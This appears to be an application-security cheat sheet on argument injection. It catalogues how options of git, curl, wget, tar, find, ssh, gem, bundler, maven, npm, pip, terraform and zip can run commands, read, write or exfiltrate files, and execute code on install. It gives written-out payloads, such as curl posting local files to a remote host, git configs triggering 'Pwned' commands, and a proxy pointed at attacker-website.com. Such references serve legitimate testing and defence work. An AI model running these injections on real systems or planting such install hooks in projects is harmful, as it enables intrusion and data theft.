Argument Injection
awk
system
awk
supports the system command that executes commands:
$ awk 'BEGIN {system("cmdname arg1 arg2")}' /dev/null
# executes the command as many rows in the file
$ awk 'system("cmdname arg1 arg2")' /path/to/file
If spaces can not be inserted, sprintf can be used to bypass it:
$ awk 'BEGIN{system(sprintf("cmdname%carg1",32))}'
References:
bundler
bundler install
bundler install uses gem
under the hood, therefore, it is possible to reuse gem's features for giving a profit.
Gemfile
Gemfile describes the gem dependencies required to execute associated Ruby code. Since it is a ruby file you can write arbitrary code that will be executed when running bundle install
.
# Gemfile
# arbitrary code here
system('echo "hola!"')
When bundle install
is run the arbitrary ruby code will be executed.
$ bundle install
hola!
hola!
The Gemfile specifies no dependencies
Resolving dependencies...
Bundle complete! 0 Gemfile dependencies, 1 gem now installed.
gem dependency
Since bundler
uses gem install
to install the specified dependencies in Gemfile
you can use extensions to embed an arbitrary code.
# hola.gemspec file
Gem::Specification.new do |s|
s.name = 'hola'
s.version = '0.0.0'
s.summary = "Hola!"
s.description = "A simple hello world gem"
s.authors = ["Nick Quaranto"]
s.email = 'nick@quaran.to'
s.files = []
s.homepage = 'https://rubygems.org/gems/hola'
s.license = 'MIT'
s.extensions = 'extconf.rb'
end
# extconf.rb
# arbitrary code here
system('echo "hola!"')
# build and push to rubygems.org
$ gem build hola.gemspec
$ gem push ./hola-0.0.0.gem
# Gemfile
source 'https://rubygems.org'
gem 'hola'
When bundle install
is run the arbitrary ruby code will be executed.
$ gem install ./hola-0.0.0.gem
Building native extensions. This could take a while...
ERROR: Error installing hola-0.0.0.gem:
ERROR: Failed to build gem native extension.
...
hola!
...
References:
git dependency
One of the sources of gems for bundler
is git repositories with a gem's source code. Since a git repository contains a source code bundler
builds it before installing. Therefore, you can write an arbitrary code that will be executed when running bundle install
.
Create a repository on github.com
with the following hola.gemspec
file:
# arbitrary code here
system('echo "hola!"')
Gem::Specification.new do |s|
s.name = 'hola'
s.version = '0.0.0'
s.summary = "Hola!"
s.description = "A simple hello world gem"
s.authors = ["Nick Quaranto"]
s.email = 'nick@quaran.to'
s.files = []
s.homepage = 'https://rubygems.org/gems/hola'
s.license = 'MIT'
end
Add the repository to Gemfile
as a git dependency.
# Gemfile
gem 'hola', :git => 'https://github.com/username/hola'
When bundle install
is run the arbitrary ruby code will be executed.
$ bundle install
Fetching https://github.com/username/hola
hola!
Resolving dependencies...
Using bundler 2.2.21
Using hola 0.0.0 from https://github.com/username/hola (at main@4a4a4ee)
Bundle complete! 1 Gemfile dependency, 2 gems now installed.
References:
path dependency
You can specify that a gem is located in a particular location on the file system. Relative paths are resolved relative to the directory containing the Gemfile
. Since a git repository contains a source code bundler
builds it before installing. Therefore, you can write an arbitrary code that will be executed when running bundle install
.
You can specify that a gem is located in a particular location on the file system. Relative paths are resolved relative to the directory containing the Gemfile
.
Similar to the semantics of the :git
option, the :path
option requires that the directory in question either contains a .gemspec
for the gem, or that you specify an explicit version that bundler should use.
Therefore, you can gain code execution using the .gemspec file with an arbitrary code or built gem with native extension.
# Gemfile
# .gemspec file is located in vendor/hola
gem 'hola', :path => "vendor/hola"
# Gemfile
# vendor/hola contains hola-0.0.0.gem file
gem 'hola', '0.0.0', :path => "vendor/hola"
When bundle install
is run the arbitrary ruby code will be executed.
$ bundle install
hola!
Resolving dependencies...
Using hola 0.0.0 from source at `vendor/hola`
Using bundler 2.2.21
Bundle complete! 1 Gemfile dependency, 2 gems now installed.
References:
curl
curl can be used to exfiltrate local files or write arbitrary content to them.
# sending local files using a POST request
$ curl --data @/path/to/local/file https://website.com
$ curl -F 'var=@/path/to/local/file' https://website.com
$ curl --upload-file /path/to/local/file https://website.com
# writing a response to a local file
$ curl https://website.com/payload.txt -o /path/to/local/file
Additionally, the file:
scheme can be used to read or copy local files:
# read a local file
$ curl file:///path/to/local/file
# copy a local file to a new place
$ curl file:///path/to/local/file -o /path/to/another/local/file
References:
find
exec
The -exec key can be used to execute arbitrary commands:
$ find . -name not_existing -or -exec cmdname arg1 arg2 \; -quit
$ find . -exec cmdname arg1 arg2 \; -quit
# read a file
$ find /path/to/file -exec cat {} \; -quit
References:
execdir
-execdir is similar to -exec
, but the specified command is run from the subdirectory containing the matched items. -execdir
can be used to execute arbitrary commands:
$ find . -name not_existing -or -execdir cmdname arg1 arg2 \; -quit
$ find . -execdir cmdname arg1 arg2 \; -quit
# read a file
$ find /path/to/file -execdir cat {} \; -quit
fprintf
-fprintf can be used to write to local files:
$ find . -fprintf /path/to/file 'arbitrary content here' -quit
References:
gem
gem build
gemspec
file is a ruby file that defines what is in the gem, who made it, and the version of the gem. Since it is a ruby file you can write arbitrary code that will be executed when running gem build
.
# hola.gemspec file
# arbitrary code here
system('echo "hola!"')
Gem::Specification.new do |s|
s.name = 'hola'
s.version = '0.0.0'
s.summary = "Hola!"
s.description = "A simple hello world gem"
s.authors = ["Nick Quaranto"]
s.email = 'nick@quaran.to'
s.files = []
s.homepage = 'https://rubygems.org/gems/hola'
s.license = 'MIT'
end
When gem build
is run the arbitrary ruby code will be executed.
$ gem build hola.gemspec
hola!
Successfully built RubyGem
Name: hola
Version: 0.0.0
File: hola-0.0.0.gem
References:
gem install
Extensions
gemspec
allows you to define extensions to build when installing a gem. Many gems use extensions to wrap libraries that are written in C with a ruby wrapper. gem
uses the extconf.rb
to build an extension during installation. Since it is a ruby file you can write arbitrary code that will be executed when running gem install
.
# hola.gemspec file
Gem::Specification.new do |s|
s.name = 'hola'
s.version = '0.0.0'
s.summary = "Hola!"
s.description = "A simple hello world gem"
s.authors = ["Nick Quaranto"]
s.email = 'nick@quaran.to'
s.files = []
s.homepage = 'https://rubygems.org/gems/hola'
s.license = 'MIT'
s.extensions = 'extconf.rb'
end
# extconf.rb
# arbitrary code here
system('echo "hola!"')
$ gem build hola.gemspec
Successfully built RubyGem
Name: hola
Version: 0.0.0
File: hola-0.0.0.gem
When gem install
is run the arbitrary ruby code will be executed.
$ gem install ./hola-0.0.0.gem
Building native extensions. This could take a while...
ERROR: Error installing hola-0.0.0.gem:
ERROR: Failed to build gem native extension.
...
hola!
...
References:
git
-c/--config-env
-c/--config-env passes a configuration parameter to the command. The value given will override values from configuration files. Check out the Abuse via .git/config section to find parameters that can be abused.
Abusing git directory
A git directory maintains an internal state, or metadata, relating to a git repository. It is created on a user's machine when:
The user does
git init
to initialise an empty local repositoryThe user does
git clone <repository>
to clone an existing repository from a remote location
The structure of a git directory is documented at https://git-scm.com/docs/gitrepository-layout
Note that a git directory is often, but not always, a directory named .git
at the root of a repo. There are several variables that can redefine a path:
GIT_COMMON_DIR environment variable or commondir file specifies a path from which non-worktree files will be taken, which are normally in
$GIT_DIR
.
Notice that the bare repositories do not have a .git
directory at all.
References:
Abuse via .git/config
.git/config
allows for the configuration of options on a per-repo basis. Many of the options allow for the specification of commands that will be executed in various situations, but some of these situations only arise when a user interacts with a git repository in a particular way.
There are at least the following ways to set the options:
On a system-wide basis using /etc/gitconfig file
On a global basis using ~/git/config or ~/.gitconfig files
On a local per-repo basis using .git/config file
On a local per-repo basis using .git/config.worktree file. This is optional and is only searched when
extensions.worktreeConfig
is present in.git/config
On a local per-repo basis using git -c/--config-env option
On a local per-repo basis using git-clone -c/--config option
core.gitProxy
core.gitProxy gives a command that will be executed when establishing a connection to a remote using the git://
protocol
$ echo $'#!/bin/bash\necho \\"Pwned as $(id)\\">&2' > pwn.sh
$ chmod +x pwn.sh
$ git clone -c core.gitProxy="./pwn.sh" git://github.com/user/project.git
Cloning into 'project'...
"Pwned as uid=0(root) gid=0(root) groups=0(root)"
fatal: Could not read from remote repository.
Please make sure you have the correct access rights and the repository exists.
core.fsmonitor
The core.fsmonitor option is used as a command which will identify all files that may have changed since the requested date/time.
In other words, many operations provided by the git will invoke the command given by core.fsmonitor
to quickly limit the operation's scope to known-changed files in the interest of performance.
At least the following git operations invoke the command given by core.fsmonitor
:
git status
used to show information about the state of the working tree, including whether any files have uncommitted changesgit add <pathspec>
used to stage changes for committing to the repogit rm --cached <file>
used to unstage changesgit commit
used to commit staged changesgit checkout <pathspec>
used to check out a file, commit, tag, branch, etc.
For operations that take a filename, core.fsmonitor
will fire even if the filename provided does not exist.
$ cd $(mktemp -d)
# initialized empty Git repository in /tmp/tmp.hLncfRcxgC/.git/
$ git init
# change core.fsmonitor so that it echoes a message to STDERR whenever it is invoked
$ echo $'\tfsmonitor = "echo \\"Pwned as $(id)\\">&2; false"' >> .git/config
$ cat .git/config
[core]
repositoryformatversion = 0
filemode = true
bare = false
logallrefupdates = true
fsmonitor = "echo \"Pwned as $(id)\">&2; false"
# git-status
$ git status
Pwned as uid=0(root) gid=0(root) groups=0(root)
Pwned as uid=0(root) gid=0(root) groups=0(root)
On branch main
No commits yet
nothing to commit (create/copy files and use "git add" to track)
# git-add
$ touch aaaa
$ git add aaaa
Pwned as uid=0(root) gid=0(root) groups=0(root)
Pwned as uid=0(root) gid=0(root) groups=0(root)
$ git add zzzz
Pwned as uid=0(root) gid=0(root) groups=0(root)
Pwned as uid=0(root) gid=0(root) groups=0(root)
fatal: pathspec 'zzzz' did not match any files
# git-commit
$ git commit -m 'add aaaa'
Pwned as uid=0(root) gid=0(root) groups=0(root)
Pwned as uid=0(root) gid=0(root) groups=0(root)
[main (root-commit) 7c2f2c6] add aaaa
1 file changed, 0 insertions(+), 0 deletions(-)
create mode 100644 aaaa
References:
core.hooksPath
core.hooksPath sets different path to hooks. You can create the post checkout hook within a repository, set the path to hooks with the hooksPath
, and execute arbitrary code.
$ git clone "<REPO>" target_directory
$ cd target_directory
$ mkdir hooks
$ echo "#!/bin/sh" > hooks/post-checkout
$ echo "echo 'arbitrary code here'" >> hooks/post-checkout
$ # commit and push
To execute the payload, run the git-clone
:
$ git clone -c core.hooksPath=hooks "<REPO>"
References:
core.pager
core.pager specifies a text viewer for use by Git commands (e.g., less). The value is meant to be interpreted by the shell and can be used to execute arbitrary commands.
For example, in the following snippet git-grep
has the --open-files-in-pager
key that uses the default pager from core.pager
if the value is unspecified in the arguments:
$ mkdir repo
$ cd repo
$ git init
$ echo "random" > hop
$ git add .
$ git -c core.pager='cmdname arg1 arg2 #' grep --open-files-in-pager .
If the pager value is not directly set by a user there is the order of preference:
GIT_PAGER
environment variable.core.pager
configuration.PAGER
environment variable.The default chosen at compile time (usually
less
).
So, the following snippet can also be used to execute commands:
$ mkdir repo
$ cd repo
$ git init
$ echo "random" > hop
$ git add .
$ GIT_PAGER='id #' git grep --open-files-in-pager .
core.sshCommand
core.sshCommand gives a command that will be executed when establishing a connection to a remote using the SSH protocol. If this variable is set, git fetch
and git push
will use the specified command instead of ssh
when they need to connect to a remote system.
$ echo $'#!/bin/bash\necho \\"Pwned as $(id)\\">&2' > pwn.sh
$ chmod +x pwn.sh
$ git clone -c core.sshCommand="./pwn.sh" git@github.com:user/project.git
# or
$ git clone -c core.sshCommand="./pwn.sh" ssh://github.com/user/project.git
Cloning into 'project'...
"Pwned as uid=0(root) gid=0(root) groups=0(root)"
fatal: Could not read from remote repository.
Please make sure you have the correct access rights and the repository exists.
diff.external
diff.external gives a command that will be used instead of git's internal diff function.
$ echo $'#!/bin/bash\necho \\"Pwned as $(id)\\">&2' > pwn.sh
$ chmod +x pwn.sh
$ git clone https://github.com/user/project.git
$ cd project
$ git -c diff.external="../pwn.sh" HEAD 480e4c9
"Pwned as uid=0(root) gid=0(root) groups=0(root)"
filter.<driver>.clean and filter.<driver>.smudge
filter..clean is used to convert the content of a worktree file to a blob upon checkin.
filter..smudge is used to convert the content of a blob object to a worktree file upon checkout.
$ cd $(mktemp -d)
# initialized empty Git repository in /tmp/tmp.hLncfRcxgC/.git/
$ git init
# filter.<driver>.clean and filter.<driver>.smudge
# so that they echo a message to STDERR whenever they are invoked
$ echo $'[filter "any"]\n\tsmudge = echo \\"Pwned smudge as $(id)\\">&2\n\tclean = echo \\"Pwned clean as $(id)\\">&2' >> ./.git/config
# add filter to .gitattributes
$ touch example
$ git add ./example
$ git commit -m 'commit'
$ echo "* text filter=any" > .gitattributes
$ git status
Pwned clean as uid=0(root) gid=0(root) groups=0(root)
On branch master
Untracked files:
(use "git add <file>..." to include in what will be committed)
.gitattributes
nothing added to commit but untracked files present (use "git add" to track)
$ git add .gitattributes
Pwned clean as uid=0(root) gid=0(root) groups=0(root)
$ cd $(mktemp -d)
# initialized empty Git repository in /tmp/tmp.hLncfRcxgC/.git/
$ git init
# filter.<driver>.clean and filter.<driver>.smudge
# so that they echo a message to STDERR whenever they are invoked
$ echo $'[filter "any"]\n\tsmudge = echo \\"Pwned smudge as $(id)\\">&2\n\tclean = echo \\"Pwned clean as $(id)\\">&2' >> ./.git/config
# add filter to .gitattributes
$ echo "* text filter=any" > .gitattributes
$ git fetch
$ git checkout main
Pwned smudge as uid=0(root) gid=0(root) groups=0(root)
Pwned smudge as uid=0(root) gid=0(root) groups=0(root)
Branch 'main' set up to track remote branch 'main' from 'origin'.
Switched to a new branch 'main'
References:
http.proxy and http.<URL>.proxy
http.proxy
or http.<URL>.proxy
override the HTTP proxy. You can use this to get SSRF:
$ git clone -c http.proxy=http://attacker-website.com -- "<REPO>" target_directory
$ git clone -c http.http://website.com/.proxy=http://attacker-website.com -- "<REPO>" target_directory
Pay attention to other http.*
configs and remote.<name>.proxy
, they can help to increase the impact.
References:
Abuse via .git/hooks/
Various files within .git/hooks/ are executed upon certain git operations. For example:
pre-commit
andpost-commit
are executed before and after a commit operation respectivelypost-checkout
is executed after checkout operationpre-push
is executed before a push operation
On filesystems that differentiate between executable and non-executable files, Hooks are only executed if the respective file is executable. Furthermore, hooks only execute given certain user interaction, such as upon performing a commit.
For instance, you can use bare repositories to deliver custom git hooks and execute arbitrary code:
# clone or create a repo
$ git clone "<REPO>" target_directory
$ cd target_directory
# add subproject as a bare repo
$ mkdir subproject
$ cd subproject
$ git init --bare
# add malicious hook
$ echo "#!/bin/sh" > hooks/post-checkout
$ echo "echo 'arbitrary code here'" >> hooks/post-checkout
# commit and push
If the vulnerable code executes the following bash commands against the prepared repository, it will trigger the custom hook execution and result in the arbitrary code being executed:
$ git clone -- "<REPO>" "target_directory"
$ cd "target_directory"
$ git checkout "subproject"
References:
Abuse via .git/index
You can achieve an arbitrary write primitive using a crafted .git/index
file, check an advisory.
Abuse via .git/HEAD
It is possible to trick Git into loading a configuration from an unintended location by corrupting .git/HEAD
. In such cases, Git starts looking for repositories in the current folder, which an attacker can fully control, for example, if the current folder is a working tree with all the files of the cloned remote repository. The exploitation flow may look like this:
$ git clone https://github.com/remote/repo.git
$ cd repo
# Create empty folders to comply with the expected structure of a Git repository
$ mkdir objects refs worktree
# Create non-empty HEAD to fake a valid reference
$ echo "ref: refs/heads/main" > HEAD
# Prepare a malicious the config file using core.fsmonitor to execute the payload
$ echo "[core]" > config
$ echo "\trepositoryformatversion = 0" >> config
$ echo "\tbare = false" >> config
$ echo "\tworktree = worktree" >> config
$ echo $'\tfsmonitor = "echo \\"Pwned as $(id)\\">&2; false"' >> config
# Corrupt the HEAD file
$ echo "" > .git/HEAD
# Exploit
$ git status
Pwned as uid=501(0xn3va)
Pwned as uid=501(0xn3va)
On branch main
No commits yet
nothing to commit (create/copy files and use "git add" to track)
References:
git-blame
--output
git-blame
has the --output
option, which is not documented in the manual and is usually present on other git sub-commands. Executing git blame --output=foo
results in interesting behaviour:
$ git init
$ git blame --output=foo
usage: git blame [<options>] [<rev-opts>] [<rev>] [--] <file>
<rev-opts> are documented in git-rev-list(1)
--incremental show blame entries as we find them, incrementally
-b do not show object names of boundary commits (Default: off)
# ...
# Notice the presence of a new file named foo
$ ls -la foo
-rw-r--r-- 1 0xn3va staff 0 Mar 18 20:18 foo
Although the command failed, an empty file named foo
was created. If a file with the same name already exists, the destination file is truncated. This option provides an arbitrary file truncation primitive. For example, an attacker can use it to corrupt a critical file in the .git
folder like .git/HEAD
and trick Git into loading a configuration from an unintended location, check out the Abuse via .git/HEAD section.
References:
git-clone
-c/--config
-c/--config sets a configuration variable in the newly-created repository; this takes effect immediately after the repository is initialized, but before the remote history is fetched or any files checked out. Check the Abuse via .git/config section to find variables that can be abused.
ext URLs
git-clone
allows shell commands to be specified in ext
URLs for remote repositories. For instance, the next example will execute the whoami
command to try to connect to a remote repository:
$ git clone 'ext::sh -c whoami% >&2'
References:
<directory>
git-clone
allows specifying a new directory to clone into. Cloning into an existing directory is only allowed if the directory is empty. You can use this to write a repo outside a default folder.
$ git clone -- "<REPO>" target_directory
-u/--upload-pack
upload-pack specifies a non-default path for the command run on the other end when the repository to clone from is accessed via ssh. You can execute arbitrary code like this:
$ mkdir repo
$ cd repo
$ git init
$ cd -
$ echo "#!/bin/bash" > payload.sh
$ echo "echo 'arbitrary payload here'" >> payload.sh
$ chmod +x payload.sh
$ git clone --upload-pack=payload.sh repo
References:
git-diff
git-diff against /dev/null
git-diff
against /dev/null
can be used to read the entire content of a file even outside the git directory.
$ git diff /dev/null /path/fo/file/outside/git/repo
$ git diff /dev/null path/to/file/in/git/repo
References:
--no-index
The --no-index key can be used to turn git-diff
into a normal diff
against another file in the git repository, which does not have to be tracked.
$ git diff --no-index local-secret-file.conf git.md
References:
git-fetch
--upload-pack
The --upload-pack flag can be used to execute arbitrary commands. The output is not shown, but it is possible to route the output to stderr using >&2
.
$ mkdir repo
$ cd repo
$ git init
$ git fetch main --upload-pack='cmdname arg1 arg2 >&2 #'
References:
git-fetch-pack
--exec
Same as --upload-pack
. Check out the section below.
--upload-pack
The --upload-pack flag can be used to execute arbitrary commands. The output is not shown, but it is possible to route the output to stderr using >&2
.
$ mkdir repo
$ cd repo
$ git init
$ git fetch-pack --upload-pack='cmdname arg1 arg2 >&2 #' .
git-grep
--no-index
no-index
tells the git-grep to search files in the current directory that is not managed by Git. In other words, if a working directory is different from a repository one no-index
allows you to get access to files in the working directory.
References:
-O/--open-files-in-pager
-O/--open-files-in-pager opens the matching files in the pager
. It can be used to run arbitrary commands:
$ mkdir repo
$ cd repo
$ git init
$ echo "random" > hop
$ git add .
$ git grep --open-files-in-pager='cmdname arg1 arg2 #' .
References:
git-log
--output
output
defines a specific file to output instead of stdout. You can use this to rewrite arbitrary files.
$ git log --output=/tmp/arbitrary_file
$ cat /tmp/arbitrary_file
commit c79538fb19b1d9d21bf26e9ad30fdeb90be1eaf0
Author: User <user@local>
Date: Fri Aug 29 00:00:00 2021 +0000
Controlled content
References:
git-ls-remote
--upload-pack
The --upload-pack flag can be used to execute arbitrary commands. The output is not shown, but it is possible to route the output to stderr using >&2
.
$ mkdir repo
$ cd repo
$ git init
$ git ls-remote --upload-pack='cmdname arg1 arg2 >&2 #' main
References:
git-pull
--upload-pack
The --upload-pack flag can be used to execute arbitrary commands. The output is not shown, but it is possible to route the output to stderr using >&2
.
$ mkdir repo
$ cd repo
$ git init
$ git pull main --upload-pack='cmdname arg1 arg2 >&2 #'
References:
git-push
--receive-pack/--exec
receive-pack or exec specifies a path to the git-receive-pack program on the remote end. You can execute arbitrary code like this:
$ echo "#!/bin/bash" > payload.sh
$ echo "echo 'arbitrary payload here'" >> payload.sh
$ chmod +x payload.sh
$ git push --receive-pack=payload.sh username/repo main
# or
$ git push --exec=payload.sh username/repo main
# or
$ git push --receive-pack=payload.sh main
maven
Execution of arbitrary commands or code during mvn <PHASE>
execution is possible through the use of various plugins such as exec-maven-plugin or groovy-maven-plugin. In order to execute a malicious payload using the groovy-maven-plugin
plugin during the phase <PHASE>
you can use the following configuration:
<plugin>
<groupId>org.codehaus.gmaven</groupId>
<artifactId>groovy-maven-plugin</artifactId>
<executions>
<execution>
<phase><!-- PHASE_HERE --></phase>
<goals>
<goal>execute</goal>
</goals>
<configuration>
<source>
print "cmdname arg1 arg2".execute().text
</source>
</configuration>
</execution>
</executions>
</plugin>
For example, you can execute the plugin during mvn initialize
or mvn compile
using the following pom.xml
file:
<?xml version="1.0" encoding="UTF-8"?>
<project>
<modelVersion>4.0.0</modelVersion>
<groupId>com.mycompany.app</groupId>
<artifactId>my-app</artifactId>
<version>1</version>
<build>
<plugins>
<plugin>
<groupId>org.codehaus.gmaven</groupId>
<artifactId>groovy-maven-plugin</artifactId>
<executions>
<execution>
<phase>initialize</phase>
<goals>
<goal>execute</goal>
</goals>
<configuration>
<source>
print "cmdname arg1 arg2".execute().text
</source>
</configuration>
</execution>
</executions>
</plugin>
</plugins>
</build>
</project>
References:
npm scripts
The scripts property of the package.json
file supports a number of built-in scripts and their preset life cycle events as well as arbitrary scripts. These all can be executed using npm run-script or npm run for short.
Pre and post commands with matching names will be run for those as well (e.g. premyscript
, myscript
, postmyscript
). To create pre or post scripts for any scripts defined in the scripts
section of the package.json
, simply create another script with a matching name and add pre
or post
to the beginning of them.
In the following example npm run compress
would execute these scripts as described.
{
"scripts": {
"precompress": "{{ executes BEFORE the `compress` script }}",
"compress": "{{ run command to compress files }}",
"postcompress": "{{ executes AFTER `compress` script }}"
}
}
There are some special life cycle scripts that happen only in certain situations. These scripts happen in addition to the pre<event>
, post<event>
, and <event>
scripts.
prepare
(since npm@4.0.0)Runs any time before the package is packed, i.e. during
npm publish
andnpm pack
Runs BEFORE the package is packed
Runs BEFORE the package is published
Runs on local
npm install
without any argumentsRun AFTER
prepublish
, but BEFOREprepublishOnly
NOTE: If a package being installed through git contains a
prepare
script, itsdependencies
anddevDependencies
will be installed, and the prepare script will be run before the package is packaged and installedAs of
npm@7
these scripts run in the background. To see the output, run with:--foreground-scripts
prepublish
(DEPRECATED)Does not run during
npm publish
, but does run duringnpm ci
andnpm install
prepublishOnly
Runs BEFORE the package is prepared and packed, ONLY on
npm publish
prepack
Runs BEFORE a tarball is packed (on
npm pack
,npm publish
, and when installing git dependencies)NOTE:
npm run pack
is NOT the same asnpm pack
.npm run pack
is an arbitrary user-defined script name, whereas,npm pack
is a CLI-defined command
postpack
Runs AFTER the tarball has been generated but before it is moved to its final destination (if at all, publish does not save the tarball locally)
npm cache add
npm cache add runs the following life cycle scripts:
prepare
npm ci
npm ci runs the following life cycle scripts:
preinstall
install
postinstall
prepublish
preprepare
prepare
postprepare
These all run after the actual installation of modules into node_modules
, in order, with no internal actions happening in between.
npm diff
npm diff runs the following life cycle scripts:
prepare
npm install
npm install runs the following life cycle scripts (also run when you run npm install -g <pkg-name>
):
preinstall
install
postinstall
prepublish
preprepare
prepare
postprepare
If there is a binding.gyp
file in the root of a package and install or preinstall scripts were not defined, npm
will default the install
command to compile using node-gyp via node-gyp rebuild
.
npm pack
npm pack runs the following life cycle scripts:
prepack
prepare
postpack
npm publish
npm publish runs the following life cycle scripts:
prepublishOnly
prepack
prepare
postpack
publish
postpublish
prepare
will not run during --dry-run
npm rebuild
npm rebuild runs the following life cycle scripts:
preinstall
install
postinstall
prepare
prepare
is only run if the current directory is a symlink (e.g. with linked packages)
npm restart
npm restart runs a restart script if it was defined, otherwise stop and start are both run if present, including their pre and post iterations):
prerestart
restart
postrestart
npm start
npm start runs the following life cycle scripts:
prestart
start
poststart
If there is a server.js
file in the root of your package, then npm
will default the start command to node server.js
. prestart
and poststart
will still run in this case.
npm stop
npm stop runs the following life cycle scripts:
prestop
stop
poststop
npm test
npm test runs the following life cycle scripts:
pretest
test
posttest
pip
pip install
Extending the setuptools
modules allows you to hook almost any pip
command. For instance, you can use the install
class within setup.py
file to execute an arbitrary code during pip install
running.
from setuptools import setup
from setuptools.command.install import install
class PostInstallCommand(install):
def run(self):
# Insert code here
install.run(self)
setup(
...
cmdclass={
'install': PostInstallCommand,
},
...
)
When pip install
is run the PostInstallCommand.run
method will be invoked.
References:
ssh
authorized_keys and id_*.pub
OpenSSH supports the command option, which specifies the command to be executed whenever a key is used for authentication.
command="cmdname arg1 arg2" ssh-ed25519 AAAAC3Nzblah....
References:
ssh_config
ssh
obtains configuration data from the following sources in the following order:
Command line
User's configuration file
~/.ssh/config
System-wide configuration file
/etc/ssh/ssh_config
LocalCommand
LocalCommand specifies a command to execute on the local machine after successfully connecting to the server. The following ssh_config
can be used to execute arbitrary commands:
Host *
PermitLocalCommand yes
LocalCommand cmdname arg1 arg2
References:
ssh-keygen
-D
ssh-keygen can load a shared library using the -D
key that leads to arbitrary command execution:
$ ssh-keygen -D lib.so
References:
tar
Checkpoints
A checkpoint is a moment of time before writing nth
record to the archive (a write checkpoint), or before reading nth
record from the archive (a read checkpoint). Checkpoints allow periodically executing arbitrary actions.
$ tar cf archieve.tar --checkpoint=1 --checkpoint-action="exec=echo 'arbitrary payload here'" foo
--to-command
When --to-command key is used, instead of creating the files specified, tar
invokes command and pipes the contents of the files to its standard output. So it can be used to execute arbitrary commands.
# Requires valid archive file
$ tar xf file.tar --to-command='cmdname arg1 arg2'
References:
-I/--use-compress-program
-I/--use-compress-program is used to specify an external compression program command that can be abused to execute arbitrary commands:
# Does not requrie valid archive
$ tar xf /dev/null --use-compress-program='cmdname arg1 arg2'
References:
terraform
terraform-plan
Terraform relies on plugins called "providers" to interact with remote systems. Terraform configurations must declare which providers they require, so that Terraform can install and use them.
You can write a custom provider, publish it to the Terraform Registry and add the provider to the Terraform code.
terraform {
required_providers {
evil = {
source = "evil/evil"
version = "1.0"
}
}
}
provider "evil" {}
$ terraform init
$ terraform plan
The provider will be pulled in during terraform init
and when terraform plan
is run the arbitrary ruby code will be executed.
Additionally, Terraform offers the external provider which provides a way to interface between Terraform and external programs. Therefore, you to use the external
data source to run arbitrary code. The following example from docs executes a python script during terraform plan
.
data "external" "example" {
program = ["python", "${path.module}/example-data-source.py"]
query = {
# arbitrary map from strings to strings, passed
# to the external program as the data query.
id = "abc123"
}
}
References:
wget
--use-askpass
--use-askpass specifies the command to prompt for a user and password. This key can be used to execute arbitrary commands without any arguments and stdout/stderr.
If no command is specified then the command in the environment variable WGET_ASKPASS
is used. If WGET_ASKPASS
is not set then the command in the environment variable SSH_ASKPASS
is used. Additionally, the default command for use-askpass
can be set up in the .wgetrc
.
$ wget --use-askpass=cmdname http://0/
References:
--post-file
--post-file can be used to exfiltrate files in a POST request.
# sends a local file to a remote server
# file is sent as-is
$ wget --post-file=/path/to/file https://website.com/
References:
-O/--output-document
-o/--output-document can be used to download a remote file via a GET request and save it to a specific location.
$ wget --output-document=/path/to/file https://website.com/file.txt
# prints a file to standard output
$ wget --output-document="-" https://website.com/file.txt
References:
-o/--output-file
-o/--output-file specifies a logfile that will be used to log all messages normally reported to standard error. It can be used to write output to a file.
# reads a local file and writes the output to another local file
# displaying only non-binary files, output is an error log
$ wget --input-file=/path/to/file --output-file=/path/to/another/file
References:
-i/--input-file
-i/--input-file reads URLs from a local or external file. This key can be used to expose a file content in an error message:
# file content will be displayed as error messages
$ wget --input-file=/path/to/file http://0/
References:
zip
-TT/--unzip-command
-TT/--unzip-command is used to specify a command to test an archive when the -T
option is used.
$ zip archieve.zip /path/to/file -T --unzip-command="cmdname arg1 arg2 #"
References:
Last updated